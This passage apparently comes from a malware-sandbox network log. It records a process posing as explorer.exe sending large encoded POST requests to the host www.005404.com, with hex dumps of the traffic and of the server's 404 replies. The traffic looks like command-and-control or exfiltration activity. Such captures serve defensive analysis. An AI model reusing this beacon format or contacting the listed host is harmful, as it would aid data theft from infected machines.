                                                                                                                                                                          Data Ascii: 7nWHV=DwjUP3e1xl1YVlY12VYjyPWH6qidmS0NwYWqWN98ssonXyOK4aunErMQnxMXSzyhsq1qUcoqMmCDW4lywgKQxwWnfrcLtTSd6ytaiP557pVO(zmMAGQeDwEaGekAHX7SAIyfQXTzpISq2AuKhI08Yul9NhpLXFUnKBnKZl71k-qewfMNqA7qIf7l99L_hPh0KQ(UbBOjPtzvZ4mBUHITh68rPhYN3RZxTm(V0xxCO5AVLcKyp3Jq9yE0SH5NCOQ_ai48VKmK24~naCP5KWURt5fCKQM-SEXj5r3KgprlUf(Ef6EZnpmfX7syHxYSPCW-QXFs68rGybhCrjrVjOKcIL33V5RZtP9rK1nPP2iIyaroBSXruMOjfBsVNGjCncna1rEjyEXCsGWGsmt68XcV0cN7f0LuPRbf8X5eQEikVHXU46D9mLJKH9t2QNouLFAo2WxofFGoO_7KE2As0fgX43ooJXIwtHpVP_Y2FlzqYIEvlk6sG10FCvZlyAcILFpXDltG27E.
                                                                                                                                                                          Dec 5, 2022 15:16:25.515036106 CET11523INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:25 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          ETag: W/"634bbb43-6cd"
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66 40 24 ac af dd 88 15 0e a6 c2 ee 19 fb 1f 05 e9 27 15 cd 06 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 3adun6`Y`= JJt@rbBc?'@CI=y0J,^5"]1KQQSm^^pZn[L)UUkYaOLMyc|KJau%VW2~[8\e}SrP_|4\H3a^(mXif60H<Lg=/?8jnjdL% ^fj[%v:W8~J>"9->W]esfeJp$Y(x|*Y+22>,.TP+]29d%tBp"g?4g`$?;4:-vN22"`1x{+P#w>lw0j;yY29XxP{s-vNZr-WL?;ji`o^"%7m%>a:gQs.R\I"?mSPy[B__&ggI`gs%}8\@0h@/4Lza]+`4-,'%+iZp{s/}rsx>osOXVBB:_q6kS;%&{}vegS~27>S]4-mo!n`uSn2$gW1FyP^umJlx@f@$'0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          29192.168.11.2049869103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:27.544348955 CET11526OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.005404.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.005404.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.005404.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 44 77 6a 55 50 33 65 31 78 6c 31 59 56 6c 59 31 32 56 59 6a 79 50 57 48 36 71 69 64 6d 53 30 4e 77 59 57 71 57 4e 39 38 73 73 67 6e 55 48 43 4b 71 72 75 6e 57 62 4d 51 76 52 4d 4b 53 7a 7a 35 73 71 64 31 55 63 31 64 4d 6c 32 44 57 70 31 79 7a 57 57 51 37 51 57 6d 51 4c 63 4a 6e 7a 54 65 36 79 70 30 69 50 74 50 36 59 68 4f 7e 30 43 4d 45 31 34 5a 63 77 46 66 47 65 6b 79 4e 33 37 73 41 49 32 50 51 57 76 7a 70 4c 71 71 31 57 71 4b 79 4f 38 38 52 65 6c 36 47 42 70 41 65 6c 56 66 4b 42 7a 34 5a 6c 36 4b 6b 5f 7e 65 77 64 45 4e 70 42 37 74 50 5f 37 6c 77 64 4c 2d 33 50 64 77 4b 51 6a 79 62 46 47 6a 50 74 4c 76 5a 59 6d 42 66 47 49 63 73 4b 38 74 4c 68 59 57 7a 52 56 35 54 6d 61 79 30 30 42 43 4f 70 45 56 4b 72 57 79 36 57 4a 71 6d 79 45 32 4e 58 35 65 58 2d 51 4b 61 68 41 65 56 4b 48 5f 32 34 61 6e 59 6d 62 35 4f 30 73 53 6b 35 66 41 54 51 4d 52 57 45 4c 52 35 72 48 57 67 70 71 2d 55 61 48 45 66 4b 55 5a 67 6f 6d 63 48 62 73 78 4b 52 59 39 64 43 61 43 51 58 78 30 36 38 6a 57 79 59 4e 43 72 44 72 56 6e 74 69 54 54 4c 33 30 5a 5a 52 78 69 76 38 72 4b 30 62 31 50 33 58 71 79 4c 33 6f 42 69 48 72 72 63 4f 6b 61 68 73 52 4c 32 6a 45 6a 63 6e 61 31 72 49 64 79 45 54 43 73 33 75 47 73 52 52 36 36 46 30 56 79 63 4e 48 66 30 4b 31 50 52 66 6b 38 58 77 39 51 45 54 42 56 45 6e 55 35 76 72 39 6f 71 4a 4a 58 39 74 7a 61 74 6f 31 50 46 45 5f 32 53 70 77 66 42 6d 43 4f 49 4c 4b 46 32 51 73 7e 5f 67 55 39 58 70 42 4f 58 49 71 70 48 6c 4a 50 37 34 48 46 68 36 79 59 4b 45 76 6e 78 36 36 44 6d 51 5f 65 50 64 6c 7e 67 51 6e 44 57 70 62 48 52 52 33 6c 4f 4e 6f 54 45 48 31 30 56 49 53 48 63 79 73 51 62 52 4b 66 30 62 44 78 71 69 49 6d 6c 42 6f 4f 76 36 65 72 58 47 33 50 4a 59 39 6f 54 33 45 62 79 6d 39 70 78 6f 5a 73 65 63 63 6b 75 59 34 68 78 47 53 44 65 74 5f 51 30 4e 6a 6a 62 6c 42 51 67 66 61 4b 33 55 6a 35 59 4f 47 65 50 62 48 4e 31 54 74 59 41 4f 38 6d 79 47 61 31 4d 58 4c 47 76 77 6a 68 55 33 42 36 59 7a 32 7e 47 71 4c 76 56 63 53 72 6c 78 6f 64 4a 6a 78 67 79 6e 43 6f 41 61 4a 68 71 43 55 64 62 30 6b 4b 66 7a 50 44 41 37 71 63 76 6d 31 52 65 6b 4e 75 64 50 77 30 52 74 61 44 33 4f 4a 66 53 31 54 46 48 79 53 67 52 52 56 32 77 6b 41 68 31 35 5f 74 36 55 46 68 31 41 6b 70 73 6a 50 66 33 44 77 7e 62 37 55 79 75 62 75 62 46 4e 39 77 4a 39 67 5a 6b 28 52 4a 4c 4c 65 6d 57 75 4a 31 64 30 4d 59 69 73 4e 44 31 6f 30 4d 68 64 45 41 71 5a 4f 6b 65 73 6b 30 4a 6d 79 58 71 79 50 75 51 37 37 50 46 78 6c 59 5a 72 7a 37 4d 67 4e 75 63 71 78 57 72 61 38 4a 51 52 73 45 4d 36 31 34 73 7e 4f 7a 52 79 5a 77 4e 4c 34 6d 72 58 4a 4b 39 66 79 73 43 49 33 77 52 7a 32 52 7a 7e 38 4d 36 45 45 7e 63 41 55 28 72 7e 51 57 62 53 69 4c 76 77 69 6a 4c 74 45 35 4a 37 50 4e 5f 4e 35 77 69 56 34 50 41 34 59 41 39 79 58 35 73 56 36 46 36 65 62 69 55 53 66 6e 31 6a 41 54 6d 6e 46 50 58 66 78 4e 4e 64 64 78 78 69 32 63 6f 65 47 73 65 64 49 4d 48 64 59 76 4a 4c 70 53 49 35 39 49 6a 69 38 68 38 56 75 54 64 35 36 42 58 34 44 35 48 4a 68 78 46 75 6e 79 54 31 6a 57 76 78 79 42 6c 63 4f 49 52 34 45 69 54 56 5f 6e 49 28 31 30 5a 6e 48 75 2d 49 50 72 36 5a 31 6d 59 44 71 4a 56 50 2d 71 6b 49 44 72 52 59 4f 31 49 57 53 34 50 61 64 65 7a 4b 50 5a 45 67 58 52 50 57 33 69 77 4f 5a 33 52 37 55 7e 77 35 5f 72 5a 78 71 63 74 4a 67 41 6a 41 79 79 54 78 6a 75 58 43 6e 50 67 47 75 6c 7a 4f 65 76 5a 70 49 74 67 72 39 30 42 70 2d 47 6e 72 6d 63 30 58 77 4d 67 50 69 28 77 43 31 6c 78 67 32 6b 6c 61 78 71 77 76 4a 38 2d 72 41 6d 4d 53 41 4d 30 6d 71 44 62 4e 6b 53 37 55 4d 32 6b 75 78 6e 44 50 32 78 58 69 4c 38 4d 7e 7a 50 41 7e 56 54 70 53 72 67 54 49 66 58 65 39 47 71 57 6b 39 4a 6e 77 42 56 6d 4e 5a 7e 38 38 4a 6c 67 7e 52 47 7a 6f 69 6e 74 5a 32 7e 4c 45 4d 42 63 7a 4f 68 75 77 7a 68 34 7a 67 4a 78 55 36 38 42 33 51 4b 4a 48 35 65 72 48 56 59 2d 48 4e 35 75 4b 4f 28 57 75 43 4b 70 70 45 41 32 48 5a 7e 47 59 55 38 36 6a 72 73 4d 68 42 59 5a 78 78 6c 68 53 4e 71 63 49 6d 53 30 34 7a 46 6d 35 48 7e 53 31 50 76 41 69 70 62 44 4f 69 52 65 59 71 46 32 41 76 74 30 76 31 61 31 4c 79 33 69 58 55 50 54 63 45 34 67 28 72 6f 56 44 6d 54 4c 76 38 4f 6f 65 47 38 7a 30 38 61 68 44 2d 75
                                                                                                                                                                          Data Ascii: 7nWHV=DwjUP3e1xl1YVlY12VYjyPWH6qidmS0NwYWqWN98ssgnUHCKqrunWbMQvRMKSzz5sqd1Uc1dMl2DWp1yzWWQ7QWmQLcJnzTe6yp0iPtP6YhO~0CME14ZcwFfGekyN37sAI2PQWvzpLqq1WqKyO88Rel6GBpAelVfKBz4Zl6Kk_~ewdENpB7tP_7lwdL-3PdwKQjybFGjPtLvZYmBfGIcsK8tLhYWzRV5Tmay00BCOpEVKrWy6WJqmyE2NX5eX-QKahAeVKH_24anYmb5O0sSk5fATQMRWELR5rHWgpq-UaHEfKUZgomcHbsxKRY9dCaCQXx068jWyYNCrDrVntiTTL30ZZRxiv8rK0b1P3XqyL3oBiHrrcOkahsRL2jEjcna1rIdyETCs3uGsRR66F0VycNHf0K1PRfk8Xw9QETBVEnU5vr9oqJJX9tzato1PFE_2SpwfBmCOILKF2Qs~_gU9XpBOXIqpHlJP74HFh6yYKEvnx66DmQ_ePdl~gQnDWpbHRR3lONoTEH10VISHcysQbRKf0bDxqiImlBoOv6erXG3PJY9oT3Ebym9pxoZsecckuY4hxGSDet_Q0NjjblBQgfaK3Uj5YOGePbHN1TtYAO8myGa1MXLGvwjhU3B6Yz2~GqLvVcSrlxodJjxgynCoAaJhqCUdb0kKfzPDA7qcvm1RekNudPw0RtaD3OJfS1TFHySgRRV2wkAh15_t6UFh1AkpsjPf3Dw~b7UyububFN9wJ9gZk(RJLLemWuJ1d0MYisND1o0MhdEAqZOkesk0JmyXqyPuQ77PFxlYZrz7MgNucqxWra8JQRsEM614s~OzRyZwNL4mrXJK9fysCI3wRz2Rz~8M6EE~cAU(r~QWbSiLvwijLtE5J7PN_N5wiV4PA4YA9yX5sV6F6ebiUSfn1jATmnFPXfxNNddxxi2coeGsedIMHdYvJLpSI59Iji8h8VuTd56BX4D5HJhxFunyT1jWvxyBlcOIR4EiTV_nI(10ZnHu-IPr6Z1mYDqJVP-qkIDrRYO1IWS4PadezKPZEgXRPW3iwOZ3R7U~w5_rZxqctJgAjAyyTxjuXCnPgGulzOevZpItgr90Bp-Gnrmc0XwMgPi(wC1lxg2klaxqwvJ8-rAmMSAM0mqDbNkS7UM2kuxnDP2xXiL8M~zPA~VTpSrgTIfXe9GqWk9JnwBVmNZ~88Jlg~RGzointZ2~LEMBczOhuwzh4zgJxU68B3QKJH5erHVY-HN5uKO(WuCKppEA2HZ~GYU86jrsMhBYZxxlhSNqcImS04zFm5H~S1PvAipbDOiReYqF2Avt0v1a1Ly3iXUPTcE4g(roVDmTLv8OoeG8z08ahD-ulBYkXPH8HOJ84rBA6Nb9ppVQKrRev4_TJUrASCXzQrjW4wNg0auhj~sB837rFg2pyO5CNF4orTm1o78lmmmuyCgKQHkPUznU_CtbXXFnbf9C3UUkqOZhXDqh9gknZIsYIGBfRvUdUMQaXp7JW2J5McANgXd7Dqxjjf3UCsALnW0jFRjC3BOEhfzrT~_hfRvTmEqdtYvW6MzJ6LVoG(0lK5IHlBNeUKpTOFZPFfNIgZypEY7plKXW_cxJReXPOxdJz~Arcxs5VJ6vX6f5b3CcAW3lpEBw2D5NxyBnI(RmgwJiSwtCKPVj3RqrwrErN0oCwCDEPly4Iv_rm9ZL1C85Zh0XECC6GkUFVshHhirjdHtGxtIbW3d1kIAvch24rEPKfkEEObevsKQfPh3nOvM(lJwqgm1ERGqVyQEB1iPEDTGups9shhYCJOaZwAJf9DO9FEXKdycl6ZeI0uggq13tDARHeUf6_itO1J2AWOPzFLutN3ODtbE~K4kmmZdVmI_ybyXjSmOXLzbsBLTo59RvmsvCqG-p0n_81MbLjPBCgE7~Ta3wVSov-fmeu(T~vcUed~ZCqDwA4Emdgg6R-i1OoMqnLJIFIAgjaqgylUKWBLT4FgLgiHqCZlQCuNjmHAGdeQj9Tz8EzCfOhT8LjStT_ZiwKQRN0bpwJezmWz3xrVNxshjHucJ(BngPIezn_5apL2l1h5Sujbq0OI5nbxzgF18J-hjPscKhE7_xZhc0wapnl4SLvBT2ewMZ3sCyZ0eMSDkiZsxGckjVc2OME40bjcmJdzAJCYLT_5RfJRnLbqmLOBY0KAAup
                                                                                                                                                                          Dec 5, 2022 15:16:27.544384956 CET11531OUTData Raw: 59 43 59 6a 68 4d 4e 4b 53 68 35 4d 32 2d 78 52 4f 33 6f 68 53 37 65 62 73 44 72 78 35 7a 66 30 6e 6f 6a 44 53 43 28 68 53 63 4f 4a 52 6e 47 52 75 2d 5a 48 72 31 42 56 4a 32 6b 66 73 6d 58 5a 43 74 36 76 49 78 4b 70 68 55 34 73 59 66 44 52 43 67
                                                                                                                                                                          Data Ascii: YCYjhMNKSh5M2-xRO3ohS7ebsDrx5zf0nojDSC(hScOJRnGRu-ZHr1BVJ2kfsmXZCt6vIxKphU4sYfDRCgwWQSroL4(W48nz37HYiODXYmjKp1VFOGgkLSZ_rqOM(iN1XQNpImRLSfeEiD(CHCtqAK~w(3U_lyYjgAi3r0KOrzhTBg4fuP78VN40eTi6gXV3KLPBZDlf6EGHt6p6CkwbFmf1T7k58sJ6SUa15JsoBKlXtzi1I1j
                                                                                                                                                                          Dec 5, 2022 15:16:27.544465065 CET11537OUTData Raw: 4e 36 57 31 37 74 62 72 63 6c 43 37 5a 30 6d 74 50 45 76 4e 54 51 33 49 48 37 4f 47 4b 4b 4b 36 52 68 4d 4e 62 64 46 45 66 64 41 78 76 2d 73 6a 43 42 68 74 4a 39 4b 61 57 2d 63 7a 30 76 75 43 52 6e 34 45 66 41 4e 57 55 55 4a 41 51 52 4e 56 61 76
                                                                                                                                                                          Data Ascii: N6W17tbrclC7Z0mtPEvNTQ3IH7OGKKK6RhMNbdFEfdAxv-sjCBhtJ9KaW-cz0vuCRn4EfANWUUJAQRNVavcjMBF5uLZmT2ZNJYc3xhUvcxhZZ8tprDWlC9GYRRbPdkwF1kPo~eNUSocNV55cofN1lG7R9ZVpm5p8T5qi7MTnw6Z_GqqFDxCAXP8W84pqd7kSCzVP39kN2SVb7bUvcVNTcuRfiHqPwC8-QeAYBE0Ps-ftb2L73XT
                                                                                                                                                                          Dec 5, 2022 15:16:27.795523882 CET11539OUTData Raw: 4a 66 52 6d 7a 39 71 4f 76 75 35 61 37 30 73 54 73 6d 7a 72 65 77 41 70 4e 45 39 77 30 4c 5a 56 43 78 32 47 66 39 28 38 54 70 54 4d 54 70 36 38 64 48 47 41 69 2d 32 39 51 67 33 4e 7a 4a 6e 4e 32 50 6b 52 43 4a 47 44 38 70 28 47 61 4a 37 74 55 57
                                                                                                                                                                          Data Ascii: JfRmz9qOvu5a70sTsmzrewApNE9w0LZVCx2Gf9(8TpTMTp68dHGAi-29Qg3NzJnN2PkRCJGD8p(GaJ7tUWgEvEJZ91I0EOhDxL7l(9RuEsq-2djGg0U2kFeOzxjMIQrQRV5B9fFbSdho1fJNbmbln0er48IqaW4UKb3z4PrbjOqFp9h33l3QQse84uEZO1dm0xJ4tJHjeWVdsxzlxJEg5LRCM2I2CIIdPEBThNkHIwp0nj1sh51
                                                                                                                                                                          Dec 5, 2022 15:16:27.795701981 CET11560OUTData Raw: 66 4b 5a 70 66 41 4e 72 76 68 31 51 73 70 70 39 6d 79 79 43 4a 68 56 75 36 41 54 4d 31 55 62 43 52 75 6f 6e 57 7a 56 74 76 58 52 59 44 57 37 45 61 41 61 59 51 38 6b 31 4e 4f 47 54 73 45 76 74 6e 57 4f 4a 79 54 62 57 6e 50 57 49 59 66 31 6e 6d 74
                                                                                                                                                                          Data Ascii: fKZpfANrvh1Qspp9myyCJhVu6ATM1UbCRuonWzVtvXRYDW7EaAaYQ8k1NOGTsEvtnWOJyTbWnPWIYf1nmtOxMhdGX_ljBaAphYWozMsmuFxACLA7RICJdbWV(X(RFis7RFiS~Znct11idUPfKqbGYn86K2H_Pfk9zTnF5p8lm2MZ4DEQAqLgRS(Q~vlssMRwUxeMLyrtrRTTr8hklN0DUmBlVOVXH98nvjtCEhGIzaHsPR7-kKI
                                                                                                                                                                          Dec 5, 2022 15:16:27.795753002 CET11562OUTData Raw: 69 45 66 67 67 61 51 77 38 63 35 64 52 6f 37 56 34 77 69 66 7e 49 33 4b 54 51 53 33 79 42 6b 72 62 69 79 47 5a 64 72 4a 68 42 72 38 7a 48 50 33 70 7a 77 56 63 57 28 33 69 6a 5a 76 65 2d 7a 5a 41 44 4f 31 53 75 7e 47 4e 51 77 50 33 76 5a 39 6f 6e
                                                                                                                                                                          Data Ascii: iEfggaQw8c5dRo7V4wif~I3KTQS3yBkrbiyGZdrJhBr8zHP3pzwVcW(3ijZve-zZADO1Su~GNQwP3vZ9on4paETBCJ8ixSbiBMMg~HTrspq2wEA1x7gzzfUSfUpez1dE73QhVS3d7nWIq9vrSU3E6Gvs(76-YQ6LfhCHfJZDjjeT7mHjzbrWuOVzIsu0niCo40pvZlPfq2ntPFc8s9Xzy0U7F2vwNUh_VAg7MbgBc496(zZUFQk
                                                                                                                                                                          Dec 5, 2022 15:16:27.796114922 CET11563INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:27 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          ETag: W/"634bbb43-6cd"
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66 40 24 ac af dd 88 15 0e a6 c2 ee 19 fb 1f 05 e9 27 15 cd 06 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 3adun6`Y`= JJt@rbBc?'@CI=y0J,^5"]1KQQSm^^pZn[L)UUkYaOLMyc|KJau%VW2~[8\e}SrP_|4\H3a^(mXif60H<Lg=/?8jnjdL% ^fj[%v:W8~J>"9->W]esfeJp$Y(x|*Y+22>,.TP+]29d%tBp"g?4g`$?;4:-vN22"`1x{+P#w>lw0j;yY29XxP{s-vNZr-WL?;ji`o^"%7m%>a:gQs.R\I"?mSPy[B__&ggI`gs%}8\@0h@/4Lza]+`4-,'%+iZp{s/}rsx>osOXVBB:_q6kS;%&{}vegS~27>S]4-mo!n`uSn2$gW1FyP^umJlx@f@$'0
                                                                                                                                                                          Dec 5, 2022 15:16:28.047391891 CET11569OUTData Raw: 65 69 49 30 57 47 75 77 54 65 6e 6b 72 2d 66 52 6a 70 4b 46 41 56 6e 42 4e 36 37 77 6f 71 62 35 61 67 37 75 53 30 7a 69 6c 52 4e 50 5a 58 65 59 4b 63 6d 38 57 30 6b 50 34 74 4c 72 48 65 6e 64 72 44 47 73 39 69 6d 35 30 54 4b 69 33 4c 54 6d 63 63
                                                                                                                                                                          Data Ascii: eiI0WGuwTenkr-fRjpKFAVnBN67woqb5ag7uS0zilRNPZXeYKcm8W0kP4tLrHendrDGs9im50TKi3LTmcc1GEdzjKytr(tl2RAUPkgo1BVuFi1pdz1dRC2xEpd6vK5V_uzXIhOz2RpK10-ilv3UyMcmGomrfVR6dlG4GjnnMXrgY(OOSMJvk(Gbq2GD711g4LDRjygYtOVbd8tUYvAxUQG3XEaqIadyXq6Hu7etN(qAzetF_VnD
